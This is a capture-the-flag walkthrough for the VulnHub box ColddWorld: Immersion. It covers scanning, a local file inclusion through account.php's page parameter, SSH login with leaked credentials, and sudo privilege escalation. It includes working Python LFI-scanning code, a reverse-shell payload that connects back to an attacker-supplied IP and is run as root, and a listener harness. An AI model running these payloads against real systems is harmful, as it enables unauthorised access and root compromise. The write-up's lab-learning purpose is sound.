ColddWorld: Immersion is a vulnerable box from VulnHub that I would rate as easy difficulty.
Nmap result:
$ sudo nmap -sC -sV 192.168.0.18
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 10:23 EEST
Nmap scan report for 192.168.0.18
Host is up (0.00029s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Immersion
MAC Address: 08:00:27:22:E5:01 (Oracle VirtualBox virtual NIC)
Gobuster scan:
$ gobuster dir -u http://192.168.0.18 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt
/js            (Status: 301)
/css           (Status: 301)
/login         (Status: 301)
/secure        (Status: 301)
/wp            (Status: 301)
/server-status (Status: 403)
Page source for /login: it reveals a file named carls.txt inside the /var directory. The /wp page goes nowhere.
We can log in to /login with random credentials. Checking the URL after logging in, we can see that account.php takes parameters for the user and the password.
Let's see if we can find other parameters by fuzzing the parameter name with a path-traversal payload as the value:
$ wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hw 0 -u '192.168.0.18/login/account.php?FUZZ=../../../../../../../../etc/passwd'
=====================================================================
ID           Response   Lines    Word     Chars       Payload
=====================================================================
000000064:   200        31 L     43 W     1608 Ch     "page"

--hw 0 hides every response with zero words, i.e. the parameter names the script ignores; the only name that returns content is "page".
Visiting "http://192.168.0.18/login/account.php?page=../../../../../../../etc/passwd" returns the contents of /etc/passwd, so we have a local file inclusion (LFI):
Retrieving carls' credentials by accessing:
http://192.168.0.18/login/account.php?page=../../../../../../../var/carls.txt
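The two LFI steps above (finding the vulnerable parameter name, then reading a file through it) scripted in Python. This is an added example and not part of the original writeup: it runs against an in-process mock of the vulnerable account.php on 127.0.0.1 so it works offline, and the mock's web root, /etc/passwd lines and carls.txt content are constructed here (the base64 value is the one the walkthrough decodes). The wordlist, marker string and traversal depth are assumptions; swap the mock's base URL for the box to run it for real.

```python
import base64
import posixpath
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the target's filesystem (assumption: contents are
# made up here, not copied from the box). Keys are virtual absolute paths.
WEBROOT = "/var/www/html/login"
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "carls:x:1001:1001::/home/carls:/bin/bash\n",
    "/var/carls.txt": "Y2FybG9z\n",  # same base64 value the walkthrough decodes
}
PASSWD_MARKER = "root:x:0:0:"


class MockAccountPHP(BaseHTTPRequestHandler):
    """Behaves like an unsanitised include($_GET['page']): the value is joined
    to the web root and normalised, so '../' sequences walk out of it."""

    def do_GET(self):
        url = urllib.parse.urlparse(self.path)
        params = urllib.parse.parse_qs(url.query)
        body = ""
        if url.path == "/login/account.php" and "page" in params:
            resolved = posixpath.normpath(posixpath.join(WEBROOT, params["page"][0]))
            body = FAKE_FS.get(resolved, "")
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_mock_target():
    srv = HTTPServer(("127.0.0.1", 0), MockAccountPHP)  # ephemeral port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


# Opener with proxies disabled so loopback traffic never hits an http_proxy.
_OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def fetch(url):
    with _OPENER.open(url, timeout=5) as resp:
        return resp.read().decode(errors="replace")


def traversal(path, depth=8):
    """Enough '../' to reach / from any plausible web root, then the target."""
    return "../" * depth + path.lstrip("/")


def find_lfi_params(base_url, candidates, probe="/etc/passwd", marker=PASSWD_MARKER):
    """The wfuzz step: try each word as a parameter name. Matching a known
    string from /etc/passwd is tighter than --hw 0, which only drops
    responses that contain no words at all."""
    hits = []
    for name in candidates:
        query = urllib.parse.urlencode({name: traversal(probe)})
        if marker in fetch("%s/login/account.php?%s" % (base_url, query)):
            hits.append(name)
    return hits


def read_file(base_url, param, path):
    query = urllib.parse.urlencode({param: traversal(path)})
    return fetch("%s/login/account.php?%s" % (base_url, query))


def decode_b64_tokens(text):
    """Decode whitespace-separated tokens that are valid base64; leave the rest."""
    out = []
    for token in text.split():
        try:
            out.append(base64.b64decode(token, validate=True).decode())
        except (ValueError, UnicodeDecodeError):
            out.append(token)
    return out


def run_demo(wordlist=("user", "file", "id", "page", "include")):
    srv, base = start_mock_target()
    try:
        params = find_lfi_params(base, wordlist)
        creds = decode_b64_tokens(read_file(base, params[0], "/var/carls.txt")) if params else []
        return {"params": params, "creds": creds}
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(run_demo())
```

The mock resolves the page value with normpath, which is why eight ../ segments are enough here and on the box: once the path reaches /, extra ../ are collapsed. Filtering on a string you know must be in the included file (rather than on response size) avoids false positives from error pages that happen to be non-empty.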
Credentials: the value stored in carls.txt is base64-encoded. Y2FybG9z decodes to carlos.

The initial scan covered only the top 1000 ports, so a full port scan is needed to find where those credentials can be used:

$ nmap -p- 192.168.0.18
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 10:36 EEST
Nmap scan report for 192.168.0.18
Host is up (0.00029s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
3042/tcp open  journee

New port discovered: 3042. Service detection on that port alone:

$ nmap -p3042 -sC -sV 192.168.0.18
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 10:37 EEST
Nmap scan report for 192.168.0.18
Host is up (0.00044s latency).
PORT     STATE SERVICE VERSION
3042/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c7:43:9b:1e:c2:a8:27:6b:c2:bc:58:a9:4d:6d:4e:14 (RSA)
|   256 60:99:c2:87:ea:6a:14:75:e1:b4:6f:93:4f:9b:fd:89 (ECDSA)
|_  256 7f:b2:4a:f2:ec:db:a5:87:45:92:2f:13:2e:5e:74:bd (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 3042 is SSH (nmap's "journee" label is just the default name for that port number), and this is where the carls credentials are used.
Checking user carls' privileges with sudo -l shows that carls can run /bin/bash as the user c0ldd, so we switch user with:
sudo -u c0ldd /bin/bash
As c0ldd, sudo -l in turn shows that we can run /home/c0ldd/DoNotRun.py as root with python3.
Note: do not run that file as it is, because it is an infinite loop. Instead, overwrite it with a reverse shell (start a listener on your machine first, then put its IP and port in the connect call):
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("Your IP",Port))  # Add your IP and Port here
# Point stdin, stdout and stderr of this process at the socket
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# The shell inherits those descriptors, so it reads commands from and writes output to the listener
p=subprocess.call(["/bin/sh","-i"])
Then run it as root, so the shell that connects back runs with root privileges:
sudo -u root /usr/bin/python3 /home/c0ldd/DoNotRun.py
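The DoNotRun.py payload needs something listening on the IP and port it connects back to. The block below is an added example, not part of the original writeup: it plays the listener role and exercises the same dup2-based connect-back end to end on the local machine (127.0.0.1 and an ephemeral port in place of the "Your IP"/Port placeholders, and the payload runs as the current user rather than being launched through the sudo rule). It assumes /bin/sh exists on the host.

```python
import socket
import subprocess
import sys
import textwrap

# Same mechanism as the DoNotRun.py payload above: connect out, point fds 0, 1 and 2
# at the socket with dup2, then start an interactive shell that reads from it.
# Host and port come from argv instead of the "Your IP"/Port placeholders.
CONNECT_BACK = textwrap.dedent("""\
    import os, socket, subprocess, sys
    host, port = sys.argv[1], int(sys.argv[2])
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    subprocess.call(["/bin/sh", "-i"])
""")


def run_through_reverse_shell(commands, timeout=15):
    """Listen on an ephemeral loopback port (the nc -lvnp role), launch the
    payload at it as the current user, feed it `commands`, and return what
    the shell sent back. Assumption: /bin/sh exists on this host."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    listener.settimeout(timeout)
    port = listener.getsockname()[1]
    # Stand-in for "sudo -u root python3 DoNotRun.py": no privilege change here.
    payload = subprocess.Popen(
        [sys.executable, "-c", CONNECT_BACK, "127.0.0.1", str(port)],
        stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
    )
    try:
        conn, _ = listener.accept()
        conn.settimeout(timeout)
        # 'exit' ends /bin/sh, which closes the far end and terminates the read loop.
        conn.sendall((commands + "\nexit\n").encode())
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
        conn.close()
        return b"".join(chunks).decode(errors="replace")
    finally:
        payload.wait(timeout=timeout)
        listener.close()


if __name__ == "__main__":
    print(run_through_reverse_shell("id; hostname"))
```

Because the shell's stderr is also redirected to the socket, the returned text includes the "$ " prompts and any job-control warnings from running an interactive shell without a tty; that is normal for this kind of shell and is why people usually upgrade it to a pty afterwards. On the box, the sudo rule is what makes the connecting shell root: python3, and therefore /bin/sh, is started by root.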
Now you can get the user flag from c0ldd's home directory and the root flag from /root!